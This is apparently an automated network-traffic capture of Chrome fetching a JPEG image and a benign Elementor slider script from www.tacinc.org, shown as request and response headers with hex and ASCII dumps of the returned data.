                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 46 ad 00 16 e8 06 80 0a 38 ed a0 00 00 00 15 28 02 4d 14 01 75 40 0d 00 2a 72 e8 00 00 00 00 00 29 6c 81 44 ba a5 00 0b 40 39 80 00 00 00 02 80 1a a2 40 ad 50 50 00 d0 07 28 00 00 00 00 0d 01 a1 44 86 a8 28 a8 a0 2d 03 94 00 00 00 00 01 69 a0 0b 1a 00 50 28 0d 01 ca 00 00 00 00 00 35 a0 05 de f3 80 02 82 80 d0 39 49 49 49 49 49 49 49 49 49 49 4d 8a 06 bd 05 c6 40 14 05 01 a6 79 80 00 00 00 00 2e c0 17 d3 41 53 ce 50 0a 00 a0 73 00 00 00 00 00 bb 00 6f 74 0a 63 20 05 00 50 e6 00 00 00 00 03 5a 85 8a 7a 6c 02 89 8c aa 50 a0 05 39 80 00 00 00 01 74 01 af 45 a0 0a 33 88 14 54 50 17 90 00 00 00 00 2e 80 2f a8 a4 50 15 30 05 02 80 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 08 01 03 10 00 00 00 f9 a0 20 00 03 20 00
                                                                                                                                                                                                                              Data Ascii: F8(Mu@*r)lD@9@PP(D(-iP(59IIIIIIIIIIM@y.ASPsotc PZzlP9tE3TP./P0
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 88 05 c3 4f 3e 3d 85 f4 9f f9 33 10 f1 23 4f 3b 58 2c 34 3f d8 68 37 13 43 0d 27 c3 12 62 f8 71 a5 80 1b 49 a5 61 a3 98 69 0f e6 e2 69 61 a0 fa b1 25 3e 12 0b 00 36 83 42 c3 fc cf ec 00 dc 41 61 a3 99 41 f7 51 31 94 9e 08 17 0d 3b 39 a1 61 a0 fe c0 0f e6 e3 4b 0d 1c c0 0e d2 86 63 2a bc 00 d3 ce cc 69 58 7f 99 fd 60 06 e4 69 58 69 3b ac 49 8b be 1a 56 00 6c 80 bd 21 fe 7c c0 0d c8 16 1a 39 80 1d f7 58 e9 88 9b b8 2c 34 86 c8 68 5f f9 0d 01 b9 9a 56 1a 43 64 a2 62 ee 86 9e 76 30 58 68 e6 00 74 dc ba c3 47 30 03 69 74 ca 4d bc 16 00 6c 46 85 86 90 dc c1 61 a4 db a8 88 ed 7d 61 a7 61 fd b0 d1 cc 00 dc cd 2c 00 dc a8 63 a7 68 34 f3 3a 6c 00 b0 d0 7f 77 43 4f 30 03 77 a9 55 b1 85 c0 0d 80 d2 b0 d2 1b 98 2c 34 f3 be 21 11 36 03 4f 3b 01 a1 60 06 e6 0b 0d 27 80
                                                                                                                                                                                                                              Data Ascii: O>=3#O;X,4?h7C'bqIaiia%>6BAaAQ1;9aKc*iX`iXi;IVl!|9X,4h_VCdbv0XhtG0itMlFa}aa,ch4:lwCO0wU,4!6O;`'
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: dc 87 c2 38 4f 84 e1 d4 67 97 f8 70 eb e4 b8 05 4f 63 fc 38 45 da 52 ec b4 b9 1e 86 72 8b 62 ec d2 ec 5c dd 54 a5 ec 98 44 48 bd 5e c5 d1 75 52 fe ef 52 8a be 0e 4a 0e 69 57 fb a6 94 a5 29 71 4b f0 df 84 72 dd 7e 11 b8 68 e3 a9 c6 cd 29 74 5d 74 a5 2e aa 52 ed 52 ea 55 9e 7f f0 28 b8 c5 2e 29 77 ee d5 29 4e 1d 09 e5 af f4 74 04 85 c5 29 4a 52 ec d2 97 34 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 24 da 24 33 ca 1c 22 ef ae 2e c3 49 f2 8f 43 1f 21 14 bb 74 bb 94 a5 2e ab b9 33 d1 c2 69 a5 29 4a 5d 37 45 2e ef 27 24 a2 23 74 af f4 a5 29 4a 5c 52 94 a5 d1 4b 8b 8a 52 f7 9c 22 12 e7 a8 a2 e2 7c 05 2e e3 70 97 ee c5 d8 a5 dd a5 2e 6e 9a 5c 24 da 21 4b ab ea f1 4a 52 94 a5 29 4a 5d 37 4d 2e 69 4b a2 89 32 24 33 96 ff 00 0e 15 17 7e e2 97 37 17 bb 63 9e 88 f0
                                                                                                                                                                                                                              Data Ascii: 8OgpOc8ERrb\TDH^uRRJiW)qKr~h)t]t.RRU(.)w)Nt)JR4)qKR)qK$$3".IC!t.3i)J]7E.'$#t)J\RKR"|.p.n\$!KJR)J]7M.iK2$3~7c
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: ab d3 91 45 d9 dc b4 70 1b 2d 26 34 d6 6e 2e 6e 69 4a 5d eb 9b a2 94 a5 c5 c5 fb 3c 7a bd 9b 8a 52 94 a5 2e 95 5b 88 4a e7 62 e9 7e 83 a8 a5 d3 4b 8b a2 94 a5 2f 65 71 4a 52 97 ec 6a b1 1d b1 bd 5c 21 25 c3 7f 91 f6 2a 5c 52 94 a5 cd 29 76 e9 4a 52 97 45 c5 c5 29 4a 5c dc 5c 52 e6 e2 e2 97 37 17 14 b9 b8 b8 a5 cd c5 c5 2e 6e 2e 29 73 71 71 4b 9b 8b 8a 5c dc 5c 52 e6 e2 e2 97 09 51 24 8b a6 94 bb 37 14 a2 ad c4 25 4b a2 e8 ba e9 71 46 93 1a 6b 37 34 a5 2e 2e bb aa 94 a5 cd c5 29 4a 5c 5d 14 a5 29 4a 52 94 bf 55 a1 c7 61 73 4a 34 24 92 22 e2 e6 94 ba a9 4b 8b a1 fa 62 97 4d de bd b5 db a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 b8 a5 29 71 4b 8a 52 97 14 a7 b0 b8 a5 29 4b a6 94 a5 29 4a 52 8b a8
                                                                                                                                                                                                                              Data Ascii: Ep-&4n.niJ]<zR.[Jb~K/eqJRj\!%*\R)vJRE)J\\R7.n.)sqqK\\RQ$7%KqFk74..)J\])JRUasJ4$"KbM)qKR)qKR)qKR)qKR)qKR)K)JR
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC625INData Raw: 7e 5e f4 be 4f f4 c8 df 7b 95 7d 3b cd 21 b6 f4 9e 13 cb 15 f2 3c fd 21 e5 97 8c f2 5e c7 9b 2b 7d 2b 26 85 92 65 4f e8 9b 48 79 37 d3 39 9e 78 a1 e6 fe 10 f2 6f c6 a9 0f 34 3c 9f 15 68 59 b4 2c 93 f2 67 4d 50 79 fc 2e 09 c4 f2 48 79 fa 43 c9 be 19 d1 3a 27 44 d1 e4 90 f3 65 6f 96 10 4d a1 67 ec a9 f5 c2 78 13 47 92 3f ac 84 21 09 d7 08 42 1d 87 9a 5d 87 93 7d 10 84 f0 6a 43 cd 21 b6 fc 18 42 68 b2 68 4d 3e 88 42 78 0d a4 36 de b3 58 42 70 36 90 f3 7f 08 6d b2 13 aa 13 99 b4 87 9b ec 8a df 85 09 d4 9b 13 4c fe 3e 59 d2 f2 7d 97 04 e0 79 24 3c 9b f2 1b 48 79 37 a4 21 08 42 10 84 21 08 42 10 84 21 08 4e 0a d0 b2 f6 28 f5 84 e2 79 24 37 79 de 49 0f 26 f9 e1 38 1e 49 0f 26 fe 8b fa 85 91 53 27 0d 48 79 37 db 9d e5 06 db f2 1e 49 0f 26 fc e8 42 10 84 21 34 59
                                                                                                                                                                                                                              Data Ascii: ~^O{};!<!^+}+&eOHy79xo4<hY,gMPy.HyC:'DeoMgxG?!B]}jC!BhhM>Bx6XBp6mL>Y}y$<Hy7!B!B!N(y$7yI&8I&S'Hy7I&B!4Y


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              128192.168.2.649866141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC938OUTGET /wp-content/uploads/2020/12/ss_138257606_Brick_Apartment_with_Trees-scaled.jpg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/elementor/css/post-7.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC484INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 655713
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                              ETag: "66f49d7d-a0161"
                                                                                                                                                                                                                              Last-Modified: Wed, 25 Sep 2024 23:32:13 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613461
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f16c81479d-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC885INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 01 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 ff c2 00 11 08 06 ab 0a 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 00 07 08 ff da 00 08 01 01 00 00 00 00 f9 fe 7c bb 09 7d 12 22 4a 15 95 ee 12 ea cd ef e6 d8 38 4f e1 76 22 c6 3d 68 ef ed c3 3a 4b 53 9c af 64 60 c2 b7 ad ca c1 0a
                                                                                                                                                                                                                              Data Ascii: JFIF$$ && 9-''-9B747BOGGOd_d$$ && 9-''-9B747BOGGOd_d"|}"J8Ov"=h:KSd`
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 24 63 19 ef 3c 46 87 85 2a 3b 5e 43 7a ef 9c 6c 6a 01 97 2b de ac 64 bf 58 b3 f2 ad be 23 37 5c 11 57 30 db 49 13 a3 49 93 90 ba 74 c1 c0 42 c8 60 6b 60 4c b2 cf ec 04 4c dc 9b 43 64 3d 42 0d 0c c6 9b 49 95 0c 7c 2d 70 02 39 9e 80 2c 54 35 b1 bf be cb 52 c3 d5 6d b1 15 1b 2d 04 5b 09 e5 7c fa 1e 74 87 c4 ad f2 ff 00 70 36 47 0b 9f ba aa 0c af a0 c8 cf 37 c8 fb 96 10 d5 56 18 ea d8 fe 81 a8 a6 27 ae 4c f2 6f 26 f6 cf 67 6f 0a b6 83 2f 99 c1 d6 c5 25 93 19 b8 f7 08 d2 fc 2f e9 9f 3a de 4d ac c7 52 78 95 4e 93 5b 17 32 d3 1e 09 8e 95 72 bd 03 5f ac 8f 6b f1 9c ef 4a 2d 7c 5a d3 48 85 10 1b 9c 4c cd ee 1b 52 55 63 02 50 8e 4e 6d 6a 35 75 17 57 f9 7e ad b6 78 24 91 13 b9 19 5b 92 88 d1 39 ca 4e 59 5b 69 0e 32 47 e4 1a cd 8f ea 50 e9 b5 ec c2 f8 90 95 7a 4b 9e
                                                                                                                                                                                                                              Data Ascii: $c<F*;^Czlj+dX#7\W0IItB`k`LLCd=BI|-p9,T5Rm-[|tp6G7V'Lo&go/%/:MRxN[2r_kJ-|ZHLRUcPNmj5uW~x$[9NY[i2GPzK
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: a4 c3 12 3d ec 93 a6 d8 cc b9 80 8a b0 71 4b 7b 6b 67 14 22 24 13 c5 8e 8d 60 b9 46 27 12 51 9f 0e 5d be 7d 7a d7 dc a9 21 79 4c 69 48 ad 89 10 47 8c 09 7b 28 41 05 7e 9a a7 44 94 52 5a 7f 4d b5 cf 40 0c 11 d5 d6 54 d7 6c 99 12 aa 44 dd c7 66 3b 65 43 e7 54 61 1b b4 3a da f9 48 32 62 ab 98 bb 68 d0 2b 68 f8 da 5d 62 04 d6 52 0d d6 f4 a3 48 a5 85 7e dc ce 2b 53 51 5f 09 f3 67 ed 26 92 d3 ce e4 db c3 8b 72 7a 2d 14 f0 8a 3e 6e ff 00 d1 cf e4 51 b6 89 1b 3d d2 5d 4b 8b af 66 83 df a0 f9 bd 54 63 ca ae 94 23 fa be 5a 86 30 e6 76 46 ca 2b 5c 69 73 97 46 69 eb a4 92 ef 0f d4 96 b2 6c ac bd 54 ba 69 61 24 5d c7 be 56 c5 cf 4b ce 52 c3 a3 b6 30 96 51 22 67 42 b7 0a 21 be 44 a8 90 bd 3b 47 8d a4 ae 60 71 90 da 88 fe e9 09 a2 d1 1d 8a f6 4c 6c 50 92 95 6a 8d 5a b2
                                                                                                                                                                                                                              Data Ascii: =qK{kg"$`F'Q]}z!yLiHG{(A~DRZM@TlDf;eCTa:H2bh+h]bRH~+SQ_g&rz->nQ=]KfTc#Z0vF+\isFilTia$]VKR0Q"gB!D;G`qLlPjZ
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: d3 40 f0 d2 59 56 10 33 a9 6c d7 2b 2b 63 3a a1 93 6a a0 33 99 62 f9 34 f3 c0 f8 c2 63 ad 3e 87 3c 0b 5a 3f 21 ad 14 63 2c 49 68 e6 07 85 06 11 a3 d9 76 e4 74 23 9f 4c e9 c2 95 51 32 55 94 00 43 68 2f 22 e7 a3 e8 81 9e 6c d9 46 f6 18 18 6c 9d 34 50 f5 ed a5 b6 9f 80 c5 91 e6 b5 70 b4 35 70 61 35 86 d9 eb fa 20 2b b4 57 72 a6 39 ed ec e5 ac f5 ea a2 cf ae c3 62 27 50 eb 8a 00 d5 47 d2 d6 5b 58 ec e2 e1 f7 95 72 cd e5 5a 9f 79 d1 a9 7c c3 cd f3 15 a2 08 1f b9 d8 1a 60 2c 05 2b a0 d5 64 af b5 34 96 6c c9 02 15 df a8 51 46 4e b3 83 16 fc 74 7a 59 7c c6 bd ef f1 8d 58 f1 5a fd 1c 3c 1c 78 85 6c 45 95 7a e6 cf d9 d5 d8 4b c7 73 62 58 ab 20 e7 6d 4e c1 65 b7 a5 06 84 35 55 d6 76 ac d1 e5 7c de 11 66 e5 da 8f e2 39 fa a4 9f 14 ae 54 be d6 f7 98 57 0c f5 8b 2b 6d
                                                                                                                                                                                                                              Data Ascii: @YV3l++c:j3b4c><Z?!c,Ihvt#LQ2UCh/"lFl4Pp5pa5 +Wr9b'PG[XrZy|`,+d4lQFNtzY|XZ<xlEzKsbX mNe5Uv|f9TW+m
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: cf 9f d6 ba 57 a9 48 87 e7 d4 28 01 56 ca 83 80 00 3a e6 2b 18 24 e2 c8 ed 5f a8 33 0c 3b a2 6b ef e3 f9 9c 4f 58 ac 25 15 66 4e cc 81 90 0a 79 9a 98 30 ef bd 28 9e 61 9d 75 74 b9 70 df 32 1c cd 4f a7 b7 51 32 be 86 25 3f 98 10 7a 5f 77 6e 6e 8b 27 83 cf 1a fb d8 75 d9 8d ae 3f c7 a2 d9 50 58 9b 8c 52 90 89 e8 77 b9 ca 7d b5 5e 32 9b 66 4f 3c f3 9a cb 13 cb d5 4a 69 76 98 ac c5 bc d2 73 97 39 91 59 34 11 79 64 6e 74 5a 08 74 90 3a d6 c2 68 c7 c1 b3 63 f8 49 28 55 f6 63 c5 51 dc 70 e9 5c c8 f5 1e 9b 7d 13 ce f6 ba ee f3 9c df a9 4f b4 6f 8e 47 8f 1b 82 ff 00 74 f4 06 a4 36 da 99 b5 76 51 8c 5e a9 f0 8d a6 1a a0 13 f6 1e de e5 87 dd 28 91 4e 44 85 2d 5d 15 a8 40 fc b7 a5 b6 b2 9e da eb 1a fb ef 3c aa 24 ef 7c c4 ef 03 e7 1e 8f 8a 89 ee 75 de 5b 95 8b 59 36
                                                                                                                                                                                                                              Data Ascii: WH(V:+$_3;kOX%fNy0(autp2OQ2%?z_wnn'u?PXRw}^2fO<Jivs9Y4ydntZt:hcI(UcQp\}OoGt6vQ^(ND-]@<$|u[Y6
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 78 9a f7 b9 82 31 85 59 61 ca de cd 78 b5 4d 63 25 7b 46 fa 7f 09 8d 73 cc 05 2a 45 92 e1 31 23 72 fc 87 61 6f bc 70 ad 37 91 b3 1e 63 52 66 cc b6 af 35 c4 a9 bb 19 a0 c0 e5 e1 cb d3 fa 86 df 0d 9d a6 b1 c5 72 26 27 49 25 c1 8b 6e 86 ec 85 48 a2 34 3c bc e3 4c 1d ad d9 56 e9 d0 60 03 83 5c ad 78 e6 ed a2 41 53 da 55 4c ac f3 27 f4 70 94 6d e7 13 97 49 e8 c0 a0 ac 5d d5 86 af cd e3 7a 2e 9e a3 22 1b cf 2c eb 68 d1 a7 48 f5 29 5d a0 99 e2 d9 6b dc 77 a9 96 ea 0f 93 42 2b 8c 6c cf 7a 26 ab cc df 23 3b 6b 2d b2 a1 1d 95 d1 df 14 9b 2b fa 4e bc 9b a9 dd 64 33 71 2a 76 6f 83 8b ec 7c c6 db d5 52 5c e9 6a 72 94 b1 dd 3b 51 e8 d4 19 39 9c ca 2f 74 b2 48 06 f3 8c 0c 3a b2 34 5d 15 8e 2e cb 55 5f ce 6f 45 d5 c9 8e 8f 8b 2a e3 a9 73 d5 34 f1 e2 43 2b b6 b7 79 bc 93
                                                                                                                                                                                                                              Data Ascii: x1YaxMc%{Fs*E1#raop7cRf5r&'I%nH4<LV`\xASUL'pmI]z.",hH)]kwB+lz&#;k-+Nd3q*vo|R\jr;Q9/tH:4].U_oE*s4C+y
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: fb 9b 5c 2b 08 de 82 eb 5f a6 76 d1 e0 4f 67 3d 39 bc 8a da e9 ed ea cf 96 a1 0e d2 bf 47 f5 4b a0 40 b4 20 9c f1 b9 cd a5 bb a4 1d f7 0d 5a c1 fc 98 78 b3 fd ab 68 f8 1f 3e c6 8b 01 a4 5d 27 7a 47 ac a8 3c 66 0a a3 1c 3f 42 db 67 7c 6f 5d 9b 84 8f 46 cc f5 af 38 c4 5f 0c cd 56 51 e4 9a 31 a3 0a d7 71 5c 9b cb 4d 16 b3 39 93 75 45 95 ce db 2d 3b 33 98 99 b5 8b 7f e7 d9 a9 1e b9 5b e5 d9 e8 06 0b 18 f2 a3 24 0e 46 bf d0 9c 01 c2 c7 69 db 12 1d ed f6 d6 ce 35 b4 5f 1a 8e 0e 9e c8 11 ba c0 c5 80 58 71 8c e9 1e bf b7 e4 a6 f3 3c 18 75 d6 f5 74 a7 6e 53 73 4d 34 71 67 d6 c8 a5 8e fd 6c 31 e7 2d 61 6f e9 23 4b e7 47 8a 5b 6a 9b 88 f6 78 5a 0a cb c1 dd 65 ee 75 5e 93 ae a4 ba 95 75 d0 29 f3 53 67 62 3c 7a ef 5a c6 33 cc ea 82 27 22 9e 5d b5 ac e6 d6 0a 1b 6a d5
                                                                                                                                                                                                                              Data Ascii: \+_vOg=9GK@ Zxh>]'zG<f?Bg|o]F8_VQ1q\M9uE-;3[$Fi5_Xq<utnSsM4qgl1-ao#KG[jxZeu^u)Sgb<zZ3'"]j
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: c6 91 ef 78 8a 03 70 31 d2 dd 97 58 35 d5 1a 2d 36 38 33 e8 d5 84 d3 49 66 b4 5a 7a 35 d5 df f6 da 7c 6c ec 7e c9 65 37 87 60 da ce 42 b6 27 96 50 c2 8e 5f 72 f4 89 04 14 e7 89 3a b6 86 36 d0 b0 e9 85 21 b3 11 7a 6c 8f 9f bc b2 13 1f 2e fb 6e cc ad 14 52 ca 37 ab fa c5 58 1b 90 dd f9 8b a1 c3 5a 8f 47 f5 4b 08 b1 f3 9e 12 f8 fc 5b 48 57 59 b8 f2 ea 66 cf 1c 9c c5 43 34 47 cb 44 47 f7 3c b3 f7 ce 92 90 c8 c2 52 d2 cc af 2c ab 49 cf de 43 8e c8 c4 f2 aa b8 62 e6 13 9a de 79 5d bd dd 70 d0 a5 f2 c8 f1 09 26 57 bc 60 b3 1e 9a ec 13 fe 83 93 1d fe 59 e7 07 bc d4 69 ea f5 18 1c 4d 64 b7 b2 43 f5 59 81 33 1f eb 5e 57 aa 89 67 e9 7a 6c d7 9b 54 5c 43 0d 1c a8 9c 5f 41 69 dd 4e 21 57 5d 0b 86 4b cf 3c d4 e4 82 dc c2 32 c7 b7 27 48 61 93 ea 58 4a db 3d a5 6f 9b e8
                                                                                                                                                                                                                              Data Ascii: xp1X5-683IfZz5|l~e7`B'P_r:6!zl.nR7XZGK[HWYfC4GDG<R,ICby]p&W`YiMdCY3^WgzlT\C_AiN!W]K<2'HaXJ=o
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 00 2b da 69 5c f8 39 d8 77 3d ac f4 9f 04 cf d0 87 9d b9 d8 11 9e 5d 59 e8 b7 16 91 70 e2 b4 7b 5a d6 0c 04 36 a5 e0 73 f9 9e 4e 5a e1 8b 98 59 be a4 f0 a2 c9 ac b2 31 8b bc cc 54 55 9f 57 2f c7 a6 c2 f5 5c 16 67 2c e4 90 5b 4f 50 f2 49 de 8b a2 b3 89 19 f1 f8 53 24 53 45 d3 fa 05 2e 03 80 2e 50 b2 52 52 39 be 8f 10 76 14 5e 6b 57 1a 41 34 de cf 2d 92 e2 ca 91 47 43 55 72 79 31 62 a4 89 76 b2 52 a5 06 9d e5 91 7c ee 11 64 5d dc e1 63 2b ec af ed ef f5 9a 2c de 03 d5 3c 67 dc 72 b3 36 d4 fe 56 1b 8c d4 63 06 e2 66 64 3a 39 b7 7e 89 44 cd 6c 6f 20 cb ac 0f a2 73 bb 4f 9f 3c ea 37 49 68 89 ce 36 b6 69 c0 39 b1 92 4e 5a 65 74 c9 5a 1b 97 52 71 ef 6e a9 bc 40 29 15 ef 19 c1 c2 2a bb d5 ef 4a d8 b6 cd 07 8f 02 49 9b 28 f2 ac 4f 95 f5 4d 36 0a a1 e0 1a 99 d5 33
                                                                                                                                                                                                                              Data Ascii: +i\9w=]Yp{Z6sNZY1TUW/\g,[OPIS$SE..PRR9v^kWA4-GCUry1bvR|d]c+,<gr6Vcfd:9~Dlo sO<7Ih6i9NZetZRqn@)*JI(OM63
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 2a cd 9c 33 fa e8 a0 68 f0 b5 f4 76 ba 41 e3 e8 74 95 b9 58 89 ea 72 29 b4 1a 4b 7c 63 32 15 f9 88 ed 9d ef 17 85 a4 f0 af 5b c1 63 85 ed fa b5 6c 5b 0a 08 b3 0e 28 91 fb ca ae e5 9d e6 46 46 c4 d5 8d 15 85 76 b7 66 90 0a 0b 32 d7 e9 63 34 74 0b 9e 03 8f 08 1b 2b ca 4f 3c 63 fd 4a ee bb cd 35 be 87 56 e6 46 b2 8d c3 0c 74 6f 01 fe 81 bd 3c 99 02 8a 3e 61 9a 1c 0c cb 5b e5 87 f3 cc 2a 18 4e f4 bf 7b f9 da e3 d1 b5 12 2b 67 d2 1e c4 66 3d 7d 45 cc b1 ab 86 8c 6a 33 b0 df 3a 31 a1 02 18 c7 bb 8a 5a 58 52 cb 22 d2 e5 c2 52 5c b6 85 16 45 53 bd cf 3b e8 40 ec 2d 55 1b 78 d0 85 33 dc fc e2 6d 56 58 3e c7 8b f3 2c f1 b7 b5 95 34 a8 f3 d8 ed 86 f7 48 17 54 54 16 be c2 a2 86 75 f3 d6 1a a7 55 46 6b ec a1 02 f7 ec 1c 84 9c 4f ac c0 f9 e6 95 5e 54 4b 6d c5 07 96 4d
                                                                                                                                                                                                                              Data Ascii: *3hvAtXr)K|c2[cl[(FFvf2c4t+O<cJ5VFto<>a[*N{+gf=}Ej3:1ZXR"R\ES;@-Ux3mVX>,4HTTuUFkO^TKmM


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              129192.168.2.649869141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC656OUTGET /wp-content/uploads/hummingbird-assets/6419b4d897e8dc5284378e8acb00aa04.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:48 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f4-280d"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614823
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f16a11463c-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC877INData Raw: 32 38 30 64 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 65 63 73 70 72 6f 2a 2a 2f 0d 0a 76 61 72 20 45 6c 65 43 75 73 74 6f 6d 53 6b 69 6e 53 6c 69 64 65 72 3d 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 66 72 6f 6e 74 65 6e 64 2e 68 61 6e 64 6c 65 72 73 2e 42 61 73 65 2e 65 78 74 65 6e 64 28 7b 67 65 74 53 6b 69 6e 50 72 65 66 69 78 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 22 63 75 73 74 6f 6d 5f 22 7d 2c 67 65 74 44 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 7b 73 65 6c 65 63 74 6f 72 73 3a 7b 63 61 72 6f 75 73 65 6c 3a 22 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 22 2c 73 6c 69 64 65 43 6f 6e 74 65 6e 74 3a 22 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 22 7d 7d 7d 2c
